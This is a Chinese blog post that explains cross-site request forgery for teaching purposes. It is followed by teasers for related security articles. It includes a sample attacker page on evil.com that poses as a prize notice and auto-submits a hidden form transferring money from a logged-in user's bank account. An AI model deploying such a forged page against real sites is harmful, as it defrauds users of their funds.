CSRF(cross-site request forgery)跨域请求访问

最新推荐文章于 2025-05-01 18:31:59 发布
最新推荐文章于 2025-05-01 18:31:59 发布
阅读量164 收藏
点赞数 1
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luluxiake_/article/details/147604723
版权

CSRF 当我们在成功登录一个网站后,会将后端返回的cookie数据进行存放,每一次访问该域名都会将cookie存放在请求头,也就相当于用户登录凭证,

但这种同域自动携带cookie存在一种问题 那就是当恶意网站也进去请求时,同样可伪造成正在登录的用户。

www.bank.com

<!-- /transfer-form 页面上的代码 -->
<form method="post" action="/transfer">
  <input type="hidden" name="csrfToken" value="abc123xyz789" />
  <input type="text" name="amount" placeholder="金额" />
  <input type="text" name="routingNumber" placeholder="路由号" />
  <input type="text" name="account" placeholder="账户" />
  <input type="submit" value="Transfer" />
</form>

伪造页面

该请求携带cookie的数据

<!-- 假设放在攻击者的站点 evil.com -->
<html>
  <body>
    <h1>你中奖了!点击下方领取奖金!</h1>
    <form method="post" action="https://bank.com/transfer">
      <input type="hidden" name="amount" value="100.00" />
      <input type="hidden" name="routingNumber" value="999999" />
      <input type="hidden" name="account" value="attackerAccount123" />
      <input type="submit" value="Win Money!" />
    </form>
    <script>
      // 自动提交:用户无需点击任何按钮,访问即发起转账
      document.forms[0].submit();
    </script>
  </body>
</html>

 那能获取本地存储(localStorage)和会话存储(sessionStorage)的数据吗

首先说一下这两者的特点 

本地存储长期存在我们的浏览器,及时浏览器关闭也不会丢失。

会话存储仅在当前tab中有效,tab关闭我们的数据也就随之丢失了

但两者有个共同特点 仅在当前域下可以访问。

所以CSRF 攻击主要依赖于 Cookie,因为浏览器会自动发送它,攻击者无法直接操控 localStoragesessionStorage 来发起 CSRF 请求。

关于CSRFCross-site request forgery请求伪造
weixin_44019182的博客
06-17 1338
CSRFCross-site request forgery请求伪造 CSRF理解 请求伪造也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF,是一种挟制用户在当前已登录的 Web 应用程序上执行非本意的操作的攻击方法。 可以理解为 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟
【网络安全CSRF漏洞—CSRF基础漏洞防御
goldfish8848的博客
09-01 1206
站点的请求请求是伪造的(假装可信)Cross-Site Request Forgery请求伪造。它是一种挟持用户在当前已登陆的Web应用程序上执行非本意的操作的攻击方法。同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。所以xyz.com下的js脚本采用ajax读取abc.com里面的文件数据会被拒绝同源策略限制了从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互。这是一个用于隔离潜在恶意文件的重要安全机制。
请求伪造(CSRFCross-Site Request Forgery
坚定目标,超越自我
10-10 2627
由于请求通常无法携带自定义头信息,因此检查请求中是否包含自定义头可以作为一种防御手段。使用自定义请求头是一种防御请求伪造(CSRF)攻击的技术。这种方法的基本思想是在客户端的请求中添加一个自定义的HTTP头部(Header),服务器端检查这个头部以验证请求的合法性。由于请求通常无法设置自定义头部,这为服务器提供了一种简单的验证机制。
CSRFCross-Site Request Forgery请求伪造)
qq_69100706的博客
04-18 606
CSRFCross-Site Request Forgery请求伪造)是一种常见的网络攻击手段,它允许攻击者在用户毫不知情的情况下,以用户的名义伪造并提交操作请求到目标网站。这种攻击主要利用了Web应用程序的用户身份验证凭证(如Cookie、Session Token等)在用户浏览器内自动包含的特点,迫使已登录用户在当前已信任的网站上执行攻击者预设的操作。目标网站接收到请求后,因为携带了有效的认证信息,误以为是用户A的正常操作,于是执行了攻击者预设的请求动作,比如转账、删除数据、修改设置等。
CSRFCross-site request forgery请求伪造详解(好文章,美团技术团队)
m_iNoError的博客
04-13 1672
背景 随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要前端技术人员不断进行“查漏补缺”。 前端安全 近几年,美团业务高速发展,前端随之面临很多安全挑战,因此积累了大
Cross-site request forgery简介
dkoq40185的博客
10-24 503
  Cross-site request forgery请求伪造,也被称成为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比...
什么是前后端分离和(Cross-site request forgery请求伪造
General_zy的博客
12-19 1277
服务器在生成一个JWT之后会将这个token发送到客户端机器,在客户端再次访问受到JWT保护的资源URL链接的时候,服务器会获取到这个token信息,首先将Header进行反编码获取到加密的算法,在通过存放在服务器上的密匙对Header.Payload 这个字符串进行加密,比对token中的Signature和实际加密出来的结果是否一致,如果一致那么说明该token是合法有效的,认证成功,否则认证失败。如果要对新的头部和负载进行签名,在不知道服务器加密时用的密钥的话,得出来的签名也是不一样的。
PortSwigger Academy | Cross-site request forgery (CSRF) : 请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
02-02 1728
文章目录什么是CSRFCSRF攻击有什么影响?CSRF如何工作?使用SameSite Cookie防御CSRF如何构造CSRF攻击Lab: CSRF vulnerability with no defenses如何进行CSRF攻击XSS vs CSRFXSS和CSRF有什么区别?CSRF令牌可以阻止XSS攻击吗?防止CSRF攻击CSRF token什么是CSRF令牌?CSRF令牌应如何生成?CSRF令牌应如何传输?CSRF令牌应如何验证?常见的CSRF漏洞CSRF令牌的验证取决于请求方法Lab: CSRF
CORS(源资源共享)&&CSRFCross-site request forgery请求伪造简介
qq_37432174的博客
08-09 672
我们知道协议、名、端口其中有一项不同,与路径不同无关,则为不同源,不同源的URL发送请求则为请求。在浏览器中采用同源策略。同源策略不仅是前端的问题。 传统的方法是通过jsonp,或者JS的JSONP 虽然能解决但是有一个很大的局限性,那就是只支持 GET 请求,不支持其他类型的请求。 这里我们在SpringBoot中使用CORS来解决同源策略 CORS(源资源共享)(CORS,C...
浅谈CSRF(Cross-site request forgery)请求伪造
weixin_30739595的博客
11-27 116
本文目录 CSRF是什么 CSRF攻击原理 CSRF攻击防范 CSRF是什么 CSRFCross-site request forgery请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任...
怎么防止请求伪造攻击(CSRF)?
Learn-anything.cn
11-24 1460
一、CSRF 是什么? 请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。 二、实际攻击场景 下面用一个银行网站的转账功能,说明攻击原理。备注:涉及到 URL 等信息都是虚构。 1、登录账号 正常登录了一家银行网站,查看其后台信息后,没有退出登录; 假设这家银行操作转账的 URL
DVWA-Cross Site Request Forgery (CSRF)
seanyang_的博客
10-26 348
CSRF攻击需要攻击者向用户发送恶意构造的链接,诱导用户点击后伪造合法用户的身份进行操作。初级CSRF渗透测试构造了第三方网站,实现了完整的攻击流程;中级CSRF渗透测试环境检查Referer参数中是否包含主机名,只需将文件名改为主机名即可绕过该防护;高级CSRF渗透测试环境则使用了Anti-CSRF token进行防护,必须借助Burp Suite的第三方插件CSRF Token Tracker才可绕过。
DVWA系列(五)——使用Burpsuite进行CSRF请求伪造)
weixin_45116657的博客
09-18 2446
CSRF(Cross-site request forgery) CSRF,全称Cross-site request forgery,翻译过来就是请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与X...
2025蓝桥杯省赛网络安全组wp
2301_79035389的博客
04-27 767
这个也是在赛后才想明白,aes加密用的是十六字节,将前十一个都填成AAAA发过去,因为ecb模式是分组加密,每一组的加密过程都是一样的,所以不需要写脚本还原加密过程去破解(其实硬写也做不到,因为拿不到key,当时我觉得用户名肯定是key,不然解不了,于是就一直卡在这一步了,实际上用户名是明文),直接将发过来的加密数据取出后几组就是admin的加密了。首先是一个按位与,我们都知道,如果gift的结果是1,那说明参与按位与的两个数在对应位置上一定是1.这道题想到思路了,但是忘记dfs怎么写了,脚本没写出来。
IEEE会议:第十届网络安全与信息工程国际会议(ICCSIE 2025)
iaast的博客
04-28 442
2025西部信息工程与技术学术论坛暨第十届网络安全与信息工程国际会议(10th International Conference on Cyber Security and Information Engineering)将于7月23-25日西宁召开。本届会议由北京工业大学、青海理工学院主办,浙江工业大学协办,IEEE计算机学会(IEEE Computer Society)技术赞助。
网络安全之浅析Java反序列化题目
anquan2233的博客
04-30 968
这段时间做了几道Java反序列化题目,发现很多题目都是类似的,并且可以通过一些非预期gadget打进去,就打算总结一下常见的题目类型以及各种解法,并提炼出一般性的思维方法。多做题,发现这些题目其实都是有规律的,先发现入口点和限制,再根据已知依赖打gadget,本质上还是要多见多积累。
深入理解网络安全中的加密技术
Thanks_ks 的嵌入式代码熔炉:炼出 STM32 到 RTOS 的极致效能!
04-26 1389
本文深入探讨了加密技术在网络安全中的核心作用,从基础概念到高级应用实践,涵盖对称与非对称加密、常见算法解析、密钥管理、数字签名与证书、HTTPS 安全实现及数据库加密策略。文章还讨论了如何防御中间人攻击,并展望了量子计算带来的挑战及其应对策略。强调持续学习和更新知识以应对新兴安全威胁的重要性。
网络安全零基础培训 L1-9 PHP连接MySQL数据库
最新发布
2401_86544210的博客
05-01 515
MySQLi是 PHP 用于与 MySQL 数据库进行交互的扩展。
【杂谈】-人工智能驱动的网络安全威胁:新一代网络钓鱼
视觉与物联智能
04-28 905
在网络安全,人工智能(AI)引发的网络威胁正对全球个人和组织构成重大风险。传统网络钓鱼攻击因AI工具的滥用不断升级,其频率、复杂性和隐蔽性逐年攀升。其中,**AI语音钓鱼(Vishing)**因其技术先进性和高欺骗性,成为最值得关注的新型攻击手段。
为什么添加Access-Control-Allow-Origin处理请求
09-14
添加 Access-Control-Allow-Origin 头部是为了处理请求请求是指在浏览器中,从一个源(名、协议、端口)发送请求到另一个源。浏览器遵循同源策略,即只允许在同一源上执行的页面访问相同源的资源。 当前端代码从一个名发送请求到另一个名时,如果服务器没有设置 Access-Control-Allow-Origin 头部,浏览器会拦截该请求,并报告一个请求错误。通过在服务器端设置 Access-Control-Allow-Origin 头部,我们可以明确指定允许访问资源的来源,从而解决请求的问题。 Access-Control-Allow-Origin 头部有两种常见的取值: 1. 单个名:指定允许访问资源的来源名。例如,设置为`Access-Control-Allow-Origin: https://example.com`表示只允许来自 https://example.com 的请求访问资源。 2. 通配符:指定允许所有访问资源。例如,设置为`Access-Control-Allow-Origin: *`表示允许任何名的请求访问资源。 需要注意的是,请求安全性需要开发者自行确保,设置 Access-Control-Allow-Origin 只是解决请求的一部分。其他安全措施如 CSRF (Cross-Site Request Forgery) 防御机制等也需要考虑。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值